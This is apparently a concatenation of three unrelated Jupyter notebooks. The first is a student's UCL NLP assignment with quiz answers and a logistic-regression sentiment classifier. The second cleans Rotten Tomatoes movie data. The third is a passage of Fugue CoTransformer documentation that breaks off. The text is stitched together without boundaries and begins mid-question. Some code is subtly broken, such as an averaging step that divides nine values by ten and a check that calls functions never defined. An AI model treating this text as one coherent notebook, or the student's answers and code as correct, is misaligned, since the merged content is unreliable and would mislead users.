Given a non-convex loss function and a very large learning rate, stochastic gradient descent is guaranteed to?#@title Answers { run: "auto" } Q1 = "None of the above" #@param ["Matrix-matrix multiplication", "Matrix-vector multiplication", "Vector-vector multiplication", "Tensor-matrix multiplication", "Tensor-vector multiplication", "None of the above"] Q2 = "It tests whether the forward pass of a function is consistent with the backward pass" #@param ["It tests whether the forward pass of a function is consistent with the backward pass", "It is used at runtime to check for numerical instabilities in the backward pass", "It tests wether the function and its gradient have been implemented correctly", "It tests whether the norm of the gradients of a function are bounded", "None of the above"] Q3 = "It would be too slow" #@param ["It cannot be used to approximate the gradient accurately enough", "It can only be used to calculate the gradient of single functions and not for chained functions which are commonly used in deep learning models", "It would be too slow", "None of the above"] Q4 = "None of the above" #@param ["The transpose of an order-three tensor", "The sum of the diagonal of a square matrix", "The outer product of two matrices", "None of the above"] Q5 = "When the tensor is contiguous" #@param ["When the tensor is non-contiguous", "When the tensor is contiguous", "None of the above"] Q6 = "They point to the same memory and altering one will change the other" #@param ["Gradients can be calculated using both, the PyTorch tensor and the NumPy array", "They point to the same memory and altering one will change the other", "The PyTorch tensor cannot be mapped back to a NumPy array", "None of the above"] Q7 = "One of the two tensors is a scalar" #@param ["One of the two tensors is a scalar", "One of the tensors has a singleton dimension", "The two tensors have the same number of dimensions", "None of the above"] Q8 = "Parameters get associated with a model when assigned to a member of the model's modules" #@param ["Parameters are mutable and tensors are not", "Parameters get associated with a model when assigned to a member of the model's modules", "Parameters need to be flattened into vectors whereas tensors can be high-dimensional", "None of the above"] Q9 = "All of the above" #@param ["Find a local optimum", "Find the global optimum", "All of the above", "None of the above"] Q10 = "None of the above" #@param ["Find a local optimum", "Find the global optimum", "Converge to a saddle point", "All of the above", "None of the above"]Part II: Feature Engineering [50 points]In this section you will develop a logistic regression model for sentiment prediction. Setup First we download the [sentence polarity dataset v1.0](http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.tar.gz) from this [website](http://www.cs.cornell.edu/people/pabo/movie-review-data/) using a few shell commands.%%shell wget http://www.cs.cornell.edu/People/pabo/movie-review-data/rt-polaritydata.tar.gz tar -xzf rt-polaritydata.tar.gz mv rt-polaritydata.README.1.0.txt rt-polaritydata cd rt-polaritydata iconv -f cp1252 -t utf-8 < rt-polarity.neg > rt-polarity.neg.utf8 iconv -f cp1252 -t utf-8 < rt-polarity.pos > rt-polarity.pos.utf8 perl -ne 'print "neg\t" . $_' < rt-polarity.neg.utf8 > rt-polarity.neg.utf8.tsv perl -ne 'print "pos\t" . 
$_' < rt-polarity.pos.utf8 > rt-polarity.pos.utf8.tsv cat rt-polarity.neg.utf8.tsv rt-polarity.pos.utf8.tsv > rt-polarity.utf8.tsv--2021-01-31 21:25:20-- http://www.cs.cornell.edu/People/pabo/movie-review-data/rt-polaritydata.tar.gz Resolving www.cs.cornell.edu (www.cs.cornell.edu)... 172.16.31.10 Connecting to www.cs.cornell.edu (www.cs.cornell.edu)|172.16.31.10|:80... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.tar.gz [following] --2021-01-31 21:25:20-- http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.tar.gz Reusing existing connection to www.cs.cornell.edu:80. HTTP request sent, awaiting response... 200 OK Length: 487770 (476K) [application/x-gzip] Saving to: ‘rt-polaritydata.tar.gz.5’ rt-polaritydata.tar 100%[===================>] 476.34K 2.47MB/s in 0.2s 2021-01-31 21:25:20 (2.47 MB/s) - ‘rt-polaritydata.tar.gz.5’ saved [487770/487770]Now we install [AllenNLP](https://allennlp.org/).%%shell pip install allennlp==0.9Requirement already satisfied: allennlp==0.9 in /usr/local/lib/python3.6/dist-packages (0.9.0) Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (1.4.1) Requirement already satisfied: tqdm>=4.19 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (4.41.1) Requirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (0.22.2.post1) Requirement already satisfied: conllu==1.3.1 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (1.3.1) Requirement already satisfied: requests>=2.18 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (2.23.0) Requirement already satisfied: boto3 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (1.16.63) Requirement already satisfied: gevent>=1.3.6 in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9) (21.1.2) Requirement already satisfied: pytest in /usr/local/lib/python3.6/dist-packages (from allennlp==0.9)[...]Next we implement a AllenNLP data loader for this data.from typing import Iterator, List, Dict, Optional import torch import torch.optim as optim import numpy as np from allennlp.data import Instance from allennlp.data.fields import TextField, SequenceLabelField, LabelField from allennlp.data.dataset_readers import DatasetReader from allennlp.common.file_utils import cached_path from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer from allennlp.data.tokenizers import Token from allennlp.data.vocabulary import Vocabulary from allennlp.models import Model from allennlp.modules.text_field_embedders import TextFieldEmbedder, BasicTextFieldEmbedder from allennlp.modules.token_embedders import Embedding from allennlp.modules.seq2seq_encoders import Seq2SeqEncoder, PytorchSeq2SeqWrapper from allennlp.nn.util import get_text_field_mask, sequence_cross_entropy_with_logits from allennlp.training.metrics import CategoricalAccuracy from allennlp.data.iterators import BucketIterator from allennlp.training.trainer import Trainer from allennlp.predictors import SentenceTaggerPredictor class PolarityDatasetReader(DatasetReader): """ DatasetReader for polarity data like neg\tI had better gone to Imperial """ def __init__(self, token_indexers: Dict[str, TokenIndexer] = None, tokenize_and_preprocess = lambda text: text.split(" ")) -> None: super().__init__(lazy=False) self.token_indexers = token_indexers or {"tokens": SingleIdTokenIndexer()} 
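# tokenize_and_preprocess is applied to each raw sentence string in _read, before the resulting tokens are wrapped in Token objects; the default simply splits on whitespace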
self.tokenize_and_preprocess = tokenize_and_preprocess def text_to_instance(self, tokens: List[Token], label: Optional[str] = None) -> Instance: sentence_field = TextField(tokens, self.token_indexers) fields = {"sentence": sentence_field} if label: label_field = LabelField(label=label) fields["label"] = label_field return Instance(fields) def _tokenize_and_preprocess(text): return text.split(" ") def _read(self, file_path: str) -> Iterator[Instance]: with open(file_path) as f: for line in f: label, text = line.split("\t") tokens = [Token(word) for word in self.tokenize_and_preprocess(text)] yield self.text_to_instance(tokens, label)Preprocessing [7pts]In order to fit our model, we will need to tokenize and preprocess the data. Write a dataset loader that preprocesses the data.Tokenization is an important field of NLP, and can make a large difference to downstream performance. Luckily fo us, the dataset has already been tokenized, so we just need to split the input text by whitespace to get the tokens. The tokenization is not perfect though. Your preprocessing function should should fix all instances where "Mr." have been tokenized as two tokens to instances where "Mr." is a single token.Implement the above by changing and possibly extending the code below.def collapse_mr_dot(text): """ Args: tokens: a list of tokens """ result = [] text = text.lower() text = text.replace("mr .", "mr.") text = text.replace("mr .", "mr.") result = text.split(" ") return result torch.manual_seed(1) reader = PolarityDatasetReader(tokenize_and_preprocess=collapse_mr_dot) data_pre = reader.read(cached_path("rt-polaritydata/rt-polarity.utf8.tsv")) rt_polarity_pre = data_pre for instance in data_pre: if "mr." in [t.text for t in instance['sentence']]: print(instance['sentence'][:]) break10662it [00:00, 10675.45it/s]Logistic RegressionBelow we provide a simple implementation of a model, that combined with the corresponding loss, amounts to logistic regression.import torch import torch.nn as nn # Model class LogisticRegression(nn.Module): """ Simple Logistic Regression implementation based on torchtext input format. """ def __init__(self, num_features): super(LogisticRegression, self).__init__() self.weights = nn.Parameter(torch.normal(torch.zeros(num_features)), requires_grad=True) def forward(self, sentence): """ Args: sentence: a dictionary of ... """ tokens = sentence['tokens'] active_tokens_mask = get_text_field_mask(sentence) # retrieve weights and set those to zero that come from padding cells filtered = active_tokens_mask * self.weights[tokens] # sum pooling along the token position dimension logits = filtered.sum(dim=1) return logits # model = LogisticRegression(vocab.get_vocab_size("tokens")) # model.forward(sentence)Formulation [5pts]In the class we have presented the model as encoder $f(\mathbf{x})$ follwed by a linear decoder$$s(\mathbf{x}) = \boldsymbol{\theta}^T f(\mathbf{x}) = \boldsymbol{\theta}^T \sum_{w\in \mathbf{x}} f(w) $$ where $f(\mathbf{x})$ is the representation of the input text. The implementation here achieves the same output, but the calculation is performed slightly differently due to technical reasons when working with pytorch. Can you give a mathematical description of this implementation here that captures the order in which computation happens? Below $f(w)$ is a one-hot representation of a word, as per lecture 2. The candidate answers are:1. $s(\mathbf{x}) = \left[\sum_{w\in \mathbf{x}} f(w) \right]^T \boldsymbol{\theta} $2. 
$s(\mathbf{x}) = \sum_{w\in \mathbf{x}} \boldsymbol{\theta}^T f(w)$3. $s(\mathbf{x}) = \frac{1}{|\mathbf{x}|}\boldsymbol{\theta}^T \sum_{\mathbf{x}\in x} f(w)$4. $s(\mathbf{x}) = \left[\sum_{w\in \mathbf{x}} f(w) \right]^T \boldsymbol{\theta} \frac{1}{|\mathbf{x}|} $#@title Answers { run: "auto" } QFormulation = "Eq 1" #@param ["Eq 1", "Eq 2", "Eq 3", "Eq 4", "None of the above"]Mean Pooling [8pts]Create a new version of the logistic regression module, using mean pooling.# Model class LogisticRegressionMeanPooling(nn.Module): """ Simple Logistic Regression implementation based on torchtext input format. """ def __init__(self, num_features): super(LogisticRegressionMeanPooling, self).__init__() self.weights = nn.Parameter(torch.normal(torch.zeros(num_features)), requires_grad=True) def forward(self, sentence): """ Args: sentence: a dictionary of ... """ tokens = sentence['tokens'] active_tokens_mask = get_text_field_mask(sentence) # retrieve weights and set those to zero that come from padding cells filtered = active_tokens_mask * self.weights[tokens] # sum pooling along the token position dimension logits = filtered.sum(dim=1) # Get the number of words for each sentence n = active_tokens_mask.sum(dim=1) # Divide by the number of words mean_logits = logits/n return mean_logitsAdd Features [20pts]Add the features below to the preprocessing pipeline shown below. Bias Feature [6 pts]It is common practice to add a *bias* term of linear classifiers:$$s(\mathbf{x}) = \boldsymbol{\theta}^T f(\mathbf{x}) + b $$One way to achieve this in general is to augment $f(\mathbf{x}) $ with an extra component that is always set to $1$. In our implementation, this can be achieved by augmenting the sentence field appropriately when loading the data, and setting the `add_features` argument in the dataset loader. Implement this below. Bigram Feature [7 pts]Use the `add_features` pipeline to implement a feature that captures whether word *pairs* $w_1, w_2$ appear consecutively in the sentence. This feature should be *combined* with the standard unigram and bias features. Max Pooling [7 pts]Use the `add_features` pipeline to implement max pooling such that any feature appearing more than once in the sentence is only counted once, as per the lecture slides of week 1.def add_features(text): """ Args: features: a list of tokens """ # TODO implement this function based on instructions above. toks = collapse_mr_dot(text) # Bias Feature toks.append('--ciao--') # Biagram # I am doing this after the bias as the question is asking for it. sentence_len = len(toks) for i in range(sentence_len - 1): toks.append(toks[i] + ' ' + toks[i + 1]) # Max Pooling unique_toks = list(dict.fromkeys(toks)) result = list(unique_toks) return result reader = PolarityDatasetReader(tokenize_and_preprocess=add_features) data_pre_2 = reader.read(cached_path("rt-polaritydata/rt-polarity.utf8.tsv")) data_pre_2[10]['sentence'][:]10662it [00:01, 7681.21it/s]Hyperparameters Search and Analysis [10 pts] Early Stopping [5pts]Finding the right number of iterations is important (why can running to convergence be bad?). One way to to do this is to iterate for a max number K, and then choose the iteration with the largest dev set performance. But this can be slow and unnecessary if we assume that dev-set performance doesn't go up again once it starts to go down (dev set performance concave). Implement a variant of the training loop that implements this idea. 
Specifically, the loop should terminate if there has been no increase in development set accuracy when comparing the current accuracy to that from 10 epochs ago. Grid Search [5pts]Using all the features you developed in the above "Add Features" section (or the base model in case you could not address the question), find the best combination of * Learning Rate in {1.0, 0.1}* Number of Training epochs (via early stopping, use 1000 as maximum)* L2 regularisation weight in {0.001, 0.0001, 0}After grid search, the value of the variables `best_acc`, `best_l2`, `best_lr` and `best_epochs` should be appropriately.def accuracy(dataset, model, iterator): # Testing the model and returning the accuracy on the given dataset total = 0 correct = 0 for batch in iterator(dataset, num_epochs=1): sentence = batch['sentence'] label = batch['label'] output = model(sentence) total += len(label) prediction = (output > 0).long() correct += (prediction == label).sum() return float(correct) / total def training_loop(model, iterator, train_set, dev_set, num_epochs=100, lr=0.1, weight_decay=0.0, early_stop_decision = 'simple'): """ Should return the best dev_set accuracy and the number of epochs used. """ criterion = torch.nn.BCEWithLogitsLoss() optimizer = torch.optim.SGD(model.parameters(), lr=lr, weight_decay=weight_decay) # Training the Model epoch_accuracies = [] best_epoch = 0 best_accuracy = 0.0 for epoch in range(num_epochs): for i, batch in enumerate(iterator(train_set,num_epochs=1)): sentence = batch['sentence'] label = batch['label'].float() # Forward + Backward + Optimize optimizer.zero_grad() logits = model(sentence) loss = criterion(logits, label) loss.backward() optimizer.step() if (i+1) % 100 == 0: print ('Epoch: [%d/%d], Step: [%d/%d], Loss: %.4f, Dev: %.4f' % (epoch+1, num_epochs, i+1, len(train_set)//iterator._batch_size, loss.data, accuracy(dev_set, model, iterator))) epoch_accuracies.append(accuracy(dev_set, model, iterator)) if epoch_accuracies[-1] > best_accuracy: best_accuracy = epoch_accuracies[-1] best_epoch = epoch # TODO: implement early stopping here # The exercise require the early stopping to happen if the comparison with the epoch accuracy has not gone up in th elast 10 iterations. # We can compare this with the 10th last result or we can use a moving average to ensure the smoothness of the function. 
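# Concretely, the 'simple' rule below stops as soon as the best dev accuracy seen so far is no better than the dev accuracy recorded 10 epochs earlier (epoch_accuracies[-11]); the 'complex' variant compares against an average of the recent epochs instead.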
# I added an argument "early_stop_decision" in training_loop with a default to simple to check for this # I use best set accuracy as specified here: https://moodle.ucl.ac.uk/mod/forum/discuss.php?d=539287 if early_stop_decision == 'simple': if len(epoch_accuracies) > 10: if best_accuracy <= epoch_accuracies[-11]: print("Early Stop") break elif early_stop_decision == 'complex': if len(epoch_accuracies) > 10: if best_accuracy <= sum(epoch_accuracies[-11:-2])/10: print("Early Stop") break return best_accuracy, best_epoch reader = PolarityDatasetReader(tokenize_and_preprocess=add_features) data = reader.read(cached_path("rt-polaritydata/rt-polarity.utf8.tsv")) training_data = data[0:-1000] dev_data = data[-1000:] vocab = Vocabulary.from_instances(training_data) iterator = BucketIterator(batch_size=32, sorting_keys=[("sentence", "num_tokens")]) iterator.index_with(vocab) print(len(training_data)) print(len(dev_data)) print(len(data)) best_acc = 0.0 # best accuracy achieved best_lr = 0.0 # best learning rate at best accuracy best_l2 = 0.0 # best l2 regularizing weight best_epochs = 0 # best number of epochs # TODO: implement grid search to make sure the above 4 variable have for lr in [1.0, 0.1]: for l2 in [0.001, 0.0001, 0]: for early_stop_decision in ["simple"]: model = LogisticRegression(num_features=vocab.get_vocab_size("tokens")) acc, epochs = training_loop(model, iterator, training_data, dev_data, lr=lr, weight_decay = l2, early_stop_decision = early_stop_decision) if acc > best_acc: print(epochs) best_acc = acc best_lr = lr best_l2 = l2 best_epochs = epochs best_early_stop_decision = early_stop_decision print("Best Accuracy working with LogisticRegression and simple early stop:") best_acc, best_epochs, best_lr, best_l2, best_early_stop_decision best_acc = 0.0 # best accuracy achieved best_lr = 0.0 # best learning rate at best accuracy best_l2 = 0.0 # best l2 regularizing weight best_epochs = 0 # best number of epochs # TODO: implement grid search to make sure the above 4 variable have for lr in [1.0, 0.1]: for l2 in [0.001, 0.0001, 0]: for early_stop_decision in ["complex"]: model = LogisticRegression(num_features=vocab.get_vocab_size("tokens")) acc, epochs = training_loop(model, iterator, training_data, dev_data, lr=lr, weight_decay = l2, early_stop_decision = early_stop_decision) if acc > best_acc: print(epochs) best_acc = acc best_lr = lr best_l2 = l2 best_epochs = epochs best_early_stop_decision = early_stop_decision print("Best Accuracy working with LogisticRegression and complex early stop:") best_acc, best_epochs, best_lr, best_l2, best_early_stop_decision best_acc = 0.0 # best accuracy achieved best_lr = 0.0 # best learning rate at best accuracy best_l2 = 0.0 # best l2 regularizing weight best_epochs = 0 # best number of epochs # TODO: implement grid search to make sure the above 4 variable have for lr in [1.0, 0.1]: for l2 in [0.001, 0.0001, 0]: for early_stop_decision in ["simple"]: model = LogisticRegressionMeanPooling(num_features=vocab.get_vocab_size("tokens")) acc, epochs = training_loop(model, iterator, training_data, dev_data, lr=lr, weight_decay = l2, early_stop_decision = early_stop_decision) if acc > best_acc: print(epochs) best_acc = acc best_lr = lr best_l2 = l2 best_epochs = epochs best_early_stop_decision = early_stop_decision print("Best Accuracy working with LogisticRegressionMeanPooling and simple early stop:") best_acc, best_epochs, best_lr, best_l2, best_early_stop_decision best_acc = 0.0 # best accuracy achieved best_lr = 0.0 # best learning rate at best 
accuracy best_l2 = 0.0 # best l2 regularizing weight best_epochs = 0 # best number of epochs # TODO: implement grid search to make sure the above 4 variable have for lr in [1.0, 0.1]: for l2 in [0.001, 0.0001, 0]: for early_stop_decision in ["complex"]: model = LogisticRegressionMeanPooling(num_features=vocab.get_vocab_size("tokens")) acc, epochs = training_loop(model, iterator, training_data, dev_data, lr=lr, weight_decay = l2, early_stop_decision = early_stop_decision) if acc > best_acc: print(epochs) best_acc = acc best_lr = lr best_l2 = l2 best_epochs = epochs best_early_stop_decision = early_stop_decision print("Best Accuracy working with LogisticRegressionMeanPooling and complex early stop:") best_acc, best_epochs, best_lr, best_l2, best_early_stop_decisionBest Accuracy working with LogisticRegressionMeanPooling and complex early stop:Evaluation Validity CheckThis is a way for you to check whether you accidentially renamed answer variables or functions that we will use for automatic evaluation. Note that this is not a comprehensive list and we do not check here whether you accidentially changed the function signatures, so failing this validity check is only a sufficient condition for telling you something went wrong.for answer in [Q1, Q2, Q3, Q4, Q5, Q6, Q7, Q8, Q9, Q10, QFormulation]: assert isinstance(answer, str) for fun in [ construct_scaled_identity, mean_diagonal, bottom_right_matrix, transpose_sum, matrixvector1, matrixvector2, matrixvector3, matrixvector4, matrixvector5, fw, bw, SortBy, collapse_mr_dot, LogisticRegressionMeanPooling, add_features, accuracy, training_loop ]: assert callable(fun)Data Cleansing of the Data collected for the Best 250 Movies of All Times Calling the Necessary Librariesimport numpy as np import pandas as pd import seaborn as sns %matplotlib inline import matplotlib.pyplot as plt plt.style.use('seaborn-whitegrid')Defining the Functions Used in the Data Cleansing# The following function replaces a string by an integer if the string is purely numerical, and by NaN otherwise. def Clean_NaN(x): try: x=int(float(x)) except: x=np.nan return x # This function removes 'K' and 'M' from a string, and automatically moves the '.' to the right by the # correct number of places. def RemoveDot (string): if string[-1]=='K': x=string.replace('K','') t='000' elif string[-1]=='M': x=string.replace('M','') t='000000' else: x='Not known!' t='' a=0; b=x.find('.') if b !=-1: while x[-1]=='0': x=x.replace(x[-1],'') x=x+t for k in range(len(x)-b): if x[len(x)-k-1]=='0': a += 1 else: break y=x.replace('.','')[:a+b] + '.' + x.replace('.','')[a+b:] else: y=x+t return y # The following function takes the runtime in the format of x hours and y mintues, and replace it by total minutes. def Convert_Runtime(x): if x=='Not available!': u=np.nan else: b1=x.find('h') try: y=int(x[:b1].strip()) except: y=0 b2=x.find('m') if b2!=-1: z=int(x[b1+1:b2].strip()) else: z=0 u=y*60+z return u # The following function, takes the 'Box Office' of a movie in US dollars, and gives the equivalent amount in the # year 2020. To do the conversion, we have extracted a table (CPI index) from the website # https://www.usinflationcalculator.com/ and saved it as a txt file. The file is read by the code, and the # following function uses the content to do the conversion. def Box_Office_Conv(x,year): z=int(round(x*CPI[year-1920])) return z # The 'Outlier_Elimination' function replaces the outliers of the list x by the bound. UpLow indicates whether # the given bound is an upper or a lower bound. 
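# For example, with bound=84 and UpLow='L', a value of 70 is clipped up to 84, while a value of 90 is returned unchanged.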
def Outlier_Elimination(x,bound,UpLow): if UpLow=='U': if x>bound: return bound else: return x elif UpLow=='L': if x<bound: return bound else: return x Calling the Data from Web-scraping# 'path' indicates where to find the file we obtained from webscraping, and 'path2' is the path for the txt file # we constructed from the website https://www.usinflationcalculator.com/ for the CPI index. path='/Users/masoud/Dropbox/Private/UMBC-DataScience/DATA-601/Homework-02/250-Best-Movies.csv' path2='/Users/masoud/Dropbox/Private/UMBC-DataScience/DATA-601/Homework-02/CPI-Conversion.txt' # Reading the file and storing the data in 'CPIIndex'. with open(path2,'rt') as f: CPIIndex=f.readlines() Year=[] CPI=[] for k in range(101): Year.append(int(CPIIndex[k].split(',')[0].strip())) CPI.append(float(CPIIndex[k].split(',')[1].strip())) # Reading the data (i.e. the result of webscraping that was stored as a csv file in 'path') into a dataframe. df=pd.read_csv(path) # For some reason, when the dataframe is read one new unwanted column is added. Here we just get rid of that # column. df.drop(columns=['Unnamed: 0'],inplace=True)Representing the Dataframe The following dataframe has 250 rows (corresponding to the 250 Best Movies) and 8 columns as follows:1. Movie Name: the name of the movie.2. Movie Year: the year the movie was produced and screened.3. Movie url: the electronic address of the movie on the 'rottentomatoes.com' website.4. Genre: the genre of the movie.5. Runtime: the length of the movie.6. Box Office: the amount in US dollars the movie earned in cinema ticket sales.7. Critic Ratings: the average rating given by critics on the 'rottentomatoes.com' website.8. Audience Ratings: the average rating given by all audiences on the 'rottentomatoes.com' website.df.shape df.head()Cleansing the Dataframe# We define a new dataframe 'New_df'. In the new dataframe, we get rid of the spaces in the names of the columns. New_df=pd.DataFrame() New_df['Movie_Name']=df['Movie Name'] New_df['Movie_url']=df['Movie url'] New_df['Genre']=df['Genre'] New_df['Movie_Year']=df['Movie Year'].apply(int) # All columns of the old dataframe 'df' have string values. For the Box Office, we convert the values to integers # through the 'RemoveDot' and 'Clean_NaN' functions first, and then we replace all the missing values by the mean of the values of # the column 'Box Office'. New_df['Box_Office_(USD)']=df['Box Office'].apply(RemoveDot).apply(Clean_NaN) New_df['Box_Office_(USD)'].fillna(value=int(round(New_df['Box_Office_(USD)'].mean())),inplace=True) New_df['Box_Office_(USD)']=New_df['Box_Office_(USD)'].astype(int) # In order to be able to compare the Box Office values, we need to convert all of the values to their equivalent values # in one year, say 2020. To do this, we take advantage of the function 'Box_Office_Conv'. New_df['Box_Office_(USD_2020)']=New_df.apply( lambda x: Box_Office_Conv(x['Box_Office_(USD)'],x['Movie_Year']), axis=1) # We find all the missing values in the column 'Critic_Ratings' and substitute them by the mean of the # column. The values of the entries of the column are of integer type in the end. New_df['Critic_Ratings']=df['Critic Ratings'].apply(Clean_NaN) New_df['Critic_Ratings'].fillna(value=round(New_df['Critic_Ratings'].mean()),inplace=True) # Similarly, we find all the missing values in the column 'Audience_Ratings' and substitute them by # the mean of the column. 
The values of the entries of the column are on integer type at the end of the day. New_df['Audience_Ratings']=df['Audience Ratings'].apply(Clean_NaN) New_df['Audience_Ratings'].fillna(value=round(New_df['Audience_Ratings'].mean()),inplace=True) # We convert the values of the column 'Runtime' to the minutes format. After the conversion, the values will have # integer type. New_df['Runtime_(min)']=df['Runtime'].apply(Convert_Runtime) New_df['Runtime_(min)'].fillna(value=round(New_df['Runtime_(min)'].mean()),inplace=True)Representing the new dataframe New_dfNew_df.head()Checking for Outliers Outliers of Box Office# The following is the box plot of the column Box Office. There seems to exist an outlier above the upper limit. # The outlier belongs to the movie 'Gone With the Wind'. We checked its boxplot against the value presented at # rottentomatoes.com, and we found that the box office value for this movie is indeed correct. So we will keep this # in our analysis. BoxPlot_Box_Office = sns.boxplot(New_df['Box_Office_(USD_2020)']) New_df.loc[New_df['Box_Office_(USD_2020)']>3500000000]Outliers of Runtime# Plotting the box plot of the Runtime column, we particularly see that there are two very lengthy movies. As we # in below, these two movies are 'The Best of Youth' and 'Satantango'. We checked the exact runtime of the two # movies, and we realized that we have the correct length of the movies in our dataframe. Therefore, we'll keep # them as they are. BoxPlot_Runtime = sns.boxplot(New_df['Runtime_(min)']) New_df.loc[New_df['Runtime_(min)']>300]Outliers of Critic Ratings# It is observed that we have a couple of low outliers for the critic ratings. We do not have an independent way # of checking the ratings. Therefore, we will replace the lower outliers by the lower fence of the box plot. BoxPlot_CRatings = sns.boxplot(New_df['Critic_Ratings']) New_df.loc[New_df['Critic_Ratings']<80] # We will substitute the lower outliers by the 'Outlier_Elimination' function we defined in HW-1. LowerBound=84 New_df.Critic_Ratings = New_df.Critic_Ratings.apply(Outlier_Elimination,args=(LowerBound,'L',)) # The new box plot for Critic Ratings shows no outliers, as expected. BoxPlot_CRatings = sns.boxplot(New_df.Critic_Ratings)Outliers of Audience Ratings# It is observed that we have a couple of low outliers for the audience ratings. We do not have an independent way # of checking the ratings. Therefore, we will replace the lower outliers by the lower fence of the box plot. BoxPlot_ARatings = sns.boxplot(New_df['Audience_Ratings']) New_df.loc[New_df['Audience_Ratings']<86] # We will substitute the lower outliers by the 'Outlier_Elimination' function we defined in HW-1. LowerBound=88 New_df.Audience_Ratings = New_df.Audience_Ratings.apply(Outlier_Elimination,args=(LowerBound,'L',)) # The new box plot for Audience Ratings shows no outliers, as expected. BoxPlot_ARatings = sns.boxplot(New_df['Audience_Ratings'])Saving the Cleansed Dataframe in a csv File# We save the cleansed dataframe to a newly defined dataframe 'New_df' as a csv file for the next step of the # process (i.e. Data Analysis) New_df.to_csv('Cleansed_Data.csv')CoTransformer`Transformer` represents the logic unit executing on arbitrary machine on a collection of partitions of the same partition keys of the input dataframes. The partitioning logic is not a concern of `CoTransformer`, it must be specified by `zip` in the previous step. 
You must understand [partition](partition.ipynb) and [zip](./execution_engine.ipynbZip-&-Comap)**Input can be a single** `DataFrames`**Alternatively it accepts input DataFrame types**: `LocalDataFrame`, `pd.DataFrame`, `List[List[Any]]`, `Iterable[List[Any]]`, `EmptyAwareIterable[List[Any]]`, `List[Dict[str, Any]]`, `Iterable[Dict[str, Any]]`, `EmptyAwareIterable[Dict[str, Any]]`**Output DataFrame types can be**: `LocalDataFrame`, `pd.DataFrame`, `List[List[Any]]`, `Iterable[List[Any]]`, `EmptyAwareIterable[List[Any]]`, `List[Dict[str, Any]]`, `Iterable[Dict[str, Any]]`, `EmptyAwareIterable[Dict[str, Any]]`Notice that `ArrayDataFrame` and other local dataframes can't be used as annotation, you must use `LocalDataFrame`.`CoTransformer` requires users to be explicit on the output schema. Different from `Transformer`, `*` is not allowed. Why Explicit on Output Schema?Normally computing frameworks can infer output schema, however, it is neither reliable nor efficient. To infer the schema, it has to go through at least one partition of data and figure out the possible schema. However, what if a transformer is producing inconsistent schemas on different data partitions? What if that partition takes a long time or fail? So to avoid potential correctness and performance issues, `Transformer` and `CoTransformer` output schemas are required in Fugue. Native ApproachThe simplest way, with no dependency on Fugue. You just need to have acceptable annotations on input dataframes and output. In native approach, you must specify schema in the Fugue code.from typing import Iterable, Dict, Any, List import pandas as pd def to_str(df1:List[List[Any]], df2:List[Dict[str,Any]], n=1) -> List[List[Any]]: return [[df1.__repr__(),df2.__repr__()]] from fugue import FugueWorkflow with FugueWorkflow() as dag: df1 = dag.df([[0,1],[1,3]],"a:int,b:int") df2 = dag.df([[0,4],[1,2]],"a:int,c:int") df3 = dag.df([[0,2],[1,1],[1,5]],"a:int,b:int") # with out schema hint you have to specify schema in Fugue code # must have zip, by default, zip inner joins them by their common keys df1.zip(df2).transform(to_str, schema="df1:str,df2:str").show() # if you don't want Fugue to infer the join keys, you can specify df1.zip(df3, partition={"by":"a"}).transform(to_str, schema="df1:str,df2:str").show() # you can also presort partitions df1.zip(df3, partition={"by":"a", "presort":"b DESC"}).transform(to_str, schema="df1:str,df2:str").show()With Schema HintWhen you need to reuse a cotransformer multiple times, it's tedious to specify the schema in Fugue code every time. You can instead, write a schema hint on top of the function, this doesn't require you to have Fugue dependency. 
The following code is doing the same thing as above but see how much shorter.from typing import Iterable, Dict, Any, List import pandas as pd #schema: df1:str,df2:str def to_str(df1:List[List[Any]], df2:List[Dict[str,Any]], n=1) -> List[List[Any]]: return [[df1.__repr__(),df2.__repr__()]] from fugue import FugueWorkflow with FugueWorkflow() as dag: df1 = dag.df([[0,1],[1,3]],"a:int,b:int") df2 = dag.df([[0,4],[1,2]],"a:int,c:int") df3 = dag.df([[0,2],[1,1],[1,5]],"a:int,b:int") df1.zip(df2).transform(to_str).show() df1.zip(df3, partition={"by":"a"}).transform(to_str).show() df1.zip(df3, partition={"by":"a", "presort":"b DESC"}).transform(to_str).show()Using DataFramesInstead of using dataframes as input, you can use a single `DataFrames` for arbitrary number of inputs.from typing import Iterable, Dict, Any, List import pandas as pd from fugue import DataFrames, FugueWorkflow #schema: res:[str] def to_str(dfs:DataFrames) -> List[List[Any]]: return [[[x.as_array().__repr__() for x in dfs.values()]]] #schema: res:[str] def to_str_with_key(dfs:DataFrames) -> List[List[Any]]: return [[[k+" "+x.as_array().__repr__() for k,x in dfs.items()]]] with FugueWorkflow() as dag: df1 = dag.df([[0,1],[1,3]],"a:int,b:int") df2 = dag.df([[0,4],[1,2]],"a:int,c:int") df3 = dag.df([[0,2],[1,1],[1,5]],"a:int,d:int") dag.zip(df1,df2,df3).transform(to_str).show() dag.zip(df1,df2,df3).transform(to_str_with_key).show() dag.zip(dict(a=df1,b=df2,c=df3)).transform(to_str_with_key).show()Decorator ApproachDecorator approach can do everything the schema hint can do, plus, it can take in a function to generate the schema.from fugue import FugueWorkflow, Schema, cotransformer from typing import Iterable, Dict, Any, List import pandas as pd # dfs is the zipped DataFrames, **params is the parameters passed in from fugue def schema_from_dfs(dfs, **params): return Schema([("_".join(df.schema.names),str) for df in dfs.values()]) @cotransformer(schema_from_dfs) def to_str(df1:List[List[Any]], df2:List[Dict[str,Any]], n=1) -> List[List[Any]]: return [[df1.__repr__(),df2.__repr__()]] with FugueWorkflow() as dag: df1 = dag.df([[0,1],[1,3]],"a:int,b:int") df2 = dag.df([[0,4],[1,2]],"a:int,c:int") df1.zip(df2).transform(to_str).show() # see the output schemaInterface ApproachAll the previous methods are just wrappers of the interface approach. They cover most of the use cases and simplify the usage. 
